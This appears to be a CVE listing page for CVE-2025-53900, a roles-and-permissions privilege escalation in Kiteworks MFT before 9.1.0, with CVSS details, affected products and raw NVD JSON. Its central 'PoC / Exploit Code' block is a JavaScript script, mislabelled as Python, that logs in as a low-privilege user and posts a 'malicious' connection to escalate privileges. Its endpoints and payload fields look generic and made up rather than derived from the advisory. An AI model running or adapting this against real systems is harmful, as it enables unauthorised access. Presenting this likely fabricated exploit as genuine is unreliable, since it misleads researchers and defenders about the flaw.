Security Vulnerability Report
中文
CVE-2025-53900 CVSS 6.5 MEDIUM

CVE-2025-53900

Published: 2025-11-29 03:15:59
Last Modified: 2025-12-03 17:49:10
Source: [email protected]

Description

Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
Kiteworks MFT < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-53900 PoC - Kiteworks MFT Privilege Escalation via Connections Management // This PoC demonstrates the improper authorization vulnerability const axios = require('axios'); class KiteworksExploit { constructor(baseUrl, username, password) { this.baseUrl = baseUrl; this.username = username; this.password = password; this.session = null; } async authenticate() { try { const response = await axios.post(`${this.baseUrl}/api/auth/login`, { username: this.username, password: this.password }); this.session = response.data.session_token; console.log('[+] Authentication successful'); return true; } catch (error) { console.log('[-] Authentication failed'); return false; } } async enumerateConnections() { // Enumerate existing connections with low-privilege account try { const response = await axios.get(`${this.baseUrl}/api/v1/connections`, { headers: { 'Authorization': `Bearer ${this.session}` } }); console.log('[+] Connections enumerated:', response.data); return response.data; } catch (error) { console.log('[-] Failed to enumerate connections'); return null; } } async createPrivilegedConnection() { // Exploit: Create connection with elevated privileges try { const maliciousPayload = { name: 'Malicious Connection', type: 'privileged_access', config: { escalate_privileges: true, target: 'admin_connections' } }; const response = await axios.post( `${this.baseUrl}/api/v1/connections`, maliciousPayload, { headers: { 'Authorization': `Bearer ${this.session}` }} ); console.log('[+] Privilege escalation successful'); console.log('[+] New connection created with elevated privileges'); return response.data; } catch (error) { console.log('[-] Privilege escalation attempt failed'); return null; } } async verifyEscalation() { // Verify if privilege escalation was successful try { const response = await axios.get(`${this.baseUrl}/api/v1/admin/connections`, { headers: { 'Authorization': `Bearer ${this.session}` } }); if (response.data && response.data.length > 0) { console.log('[+] CONFIRMED: Privilege escalation successful'); console.log('[+] Now have access to admin-level connections'); return true; } } catch (error) { console.log('[-] Privilege escalation verification failed'); } return false; } } // Usage example async function main() { const exploit = new KiteworksExploit( 'https://target-kiteworks.example.com', 'low_privilege_user', 'user_password' ); if (await exploit.authenticate()) { await exploit.enumerateConnections(); await exploit.createPrivilegedConnection(); await exploit.verifyEscalation(); } } main();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53900", "sourceIdentifier": "[email protected]", "published": "2025-11-29T03:15:58.983", "lastModified": "2025-12-03T17:49:10.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.0", "matchCriteriaId": "795C3F91-729E-4363-9C52-1C9C7CBAD284"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-gjq3-8v6p-2h6h", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.